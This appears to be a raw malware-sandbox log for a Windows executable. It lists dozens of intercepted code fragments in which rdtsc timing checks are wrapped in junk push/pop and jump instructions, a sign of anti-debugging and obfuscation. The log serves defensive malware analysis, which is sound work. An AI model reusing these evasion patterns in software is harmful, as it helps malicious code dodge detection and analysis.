Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443ACB second address: 443AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F03 second address: 443F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F07 second address: 443F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F10 second address: 443F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED552h 0x00000009 jnl 00007FD1807ED546h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD1807ED552h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F43 second address: 443F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FD180B5C156h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44651C second address: 44658B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov si, dx 0x0000000f push 00000000h 0x00000011 and ch, 0000003Bh 0x00000014 push 943A65A8h 0x00000019 pushad 0x0000001a push ebx 0x0000001b jl 00007FD1807ED546h 0x00000021 pop ebx 0x00000022 push edx 0x00000023 jmp 00007FD1807ED554h 0x00000028 pop edx 0x00000029 popad 0x0000002a add dword ptr [esp], 6BC59AD8h 0x00000031 sub esi, 5594CB6Dh 0x00000037 push 00000003h 0x00000039 add dh, 0000000Dh 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D2CC3h] 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 cmc 0x00000048 mov ebx, dword ptr [ebp+122D2997h] 0x0000004e popad 0x0000004f push 499A4006h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44670F second address: 446713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446713 second address: 446736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD1807ED559h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446736 second address: 446759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446759 second address: 44675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44675D second address: 446761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446761 second address: 4467B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD1807ED553h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FD1807ED552h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2C93h] 0x0000001e lea ebx, dword ptr [ebp+1245B3C8h] 0x00000024 jg 00007FD1807ED54Ch 0x0000002a push eax 0x0000002b push ebx 0x0000002c jnc 00007FD1807ED54Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446826 second address: 4468AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FD180B5C167h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD180B5C15Dh 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 call 00007FD180B5C15Fh 0x0000001e mov ecx, dword ptr [ebp+122D2A17h] 0x00000024 pop edi 0x00000025 mov esi, eax 0x00000027 popad 0x00000028 push 00000000h 0x0000002a mov ecx, eax 0x0000002c mov edx, dword ptr [ebp+122D2C5Fh] 0x00000032 call 00007FD180B5C159h 0x00000037 jmp 00007FD180B5C15Dh 0x0000003c push eax 0x0000003d jmp 00007FD180B5C15Eh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FD180B5C160h 0x0000004b mov eax, dword ptr [eax] 0x0000004d push eax 0x0000004e push edx 0x0000004f jnc 00007FD180B5C158h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4468AF second address: 4468BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD1807ED546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4468BA second address: 44694D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FD180B5C160h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FD180B5C158h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FD180B5C158h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 pushad 0x00000049 mov edi, dword ptr [ebp+122D33EDh] 0x0000004f or dword ptr [ebp+122D3543h], edi 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+122D2CCFh] 0x0000005c push 00000000h 0x0000005e or ecx, dword ptr [ebp+122D322Ch] 0x00000064 push 00000003h 0x00000066 jmp 00007FD180B5C161h 0x0000006b push B5C169CDh 0x00000070 push eax 0x00000071 push edx 0x00000072 push ecx 0x00000073 push ebx 0x00000074 pop ebx 0x00000075 pop ecx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44694D second address: 446953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446953 second address: 446957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446957 second address: 4469B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 75C169CDh 0x00000012 call 00007FD1807ED54Bh 0x00000017 mov dl, bh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245B3D3h] 0x00000020 jng 00007FD1807ED54Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD1807ED558h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4469B7 second address: 4469BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4469BD second address: 4469D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD1807ED54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jl 00007FD1807ED546h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467B79 second address: 467B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467B84 second address: 467B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD1807ED546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 465BCA second address: 465BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4663BB second address: 4663D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4663D1 second address: 4663D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 466534 second address: 46653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46681F second address: 466825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46697A second address: 466984 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 466984 second address: 466990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 45CEAE second address: 45CEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467761 second address: 467772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467772 second address: 467797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD1807ED54Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295BB second address: 4295C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295C1 second address: 4295C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295C5 second address: 4295CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295CD second address: 4295D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295D3 second address: 4295D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295D7 second address: 4295E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD1807ED546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D26A second address: 46D275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD180B5C156h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D275 second address: 46D2A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD1807ED54Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED551h 0x00000011 jmp 00007FD1807ED54Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D2A5 second address: 46D2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D2AB second address: 46D2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D2B1 second address: 46D2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 43537D second address: 435398 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD1807ED553h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 435398 second address: 43539C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47372B second address: 473732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473732 second address: 47373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473A17 second address: 473A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED552h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473A2D second address: 473A33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473D4A second address: 473D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473EFA second address: 473EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473EFE second address: 473F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473F04 second address: 473F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4775C7 second address: 4775D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477851 second address: 477857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47794C second address: 477950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477FED second address: 477FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477FF2 second address: 47800E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47828A second address: 478297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 478297 second address: 47829B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47829B second address: 4782A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4782A5 second address: 4782A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 478B94 second address: 478BD2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c ja 00007FD180B5C164h 0x00000012 nop 0x00000013 mov dword ptr [ebp+1245A7BFh], esi 0x00000019 push 00000000h 0x0000001b mov esi, dword ptr [ebp+122D2BCBh] 0x00000021 push 00000000h 0x00000023 sub edi, dword ptr [ebp+122D2BEBh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 479562 second address: 479566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47A5F7 second address: 47A606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47A606 second address: 47A66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED559h 0x00000009 popad 0x0000000a pop esi 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1BD9h], ecx 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D2CDFh] 0x0000001a push 00000000h 0x0000001c jmp 00007FD1807ED553h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FD1807ED559h 0x00000027 push eax 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007FD1807ED546h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47CB88 second address: 47CB93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47B8CA second address: 47B8CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 43BD85 second address: 43BDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FD180B5C158h 0x0000000b pushad 0x0000000c jmp 00007FD180B5C15Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DEE3 second address: 47DEED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DEED second address: 47DF07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD180B5C15Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC5E second address: 47DC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DF07 second address: 47DF42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1C93h], ebx 0x00000010 push 00000000h 0x00000012 stc 0x00000013 push 00000000h 0x00000015 mov edi, eax 0x00000017 mov edi, dword ptr [ebp+122D2B17h] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FD180B5C15Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC79 second address: 47DC95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DF42 second address: 47DF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC95 second address: 47DC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E94D second address: 47E952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E952 second address: 47E96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E96E second address: 47E9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D30A3h], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD180B5C158h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FD180B5C158h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jmp 00007FD180B5C164h 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 je 00007FD180B5C15Ch 0x00000056 jl 00007FD180B5C156h 0x0000005c pop eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E9EB second address: 47E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E9EF second address: 47E9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
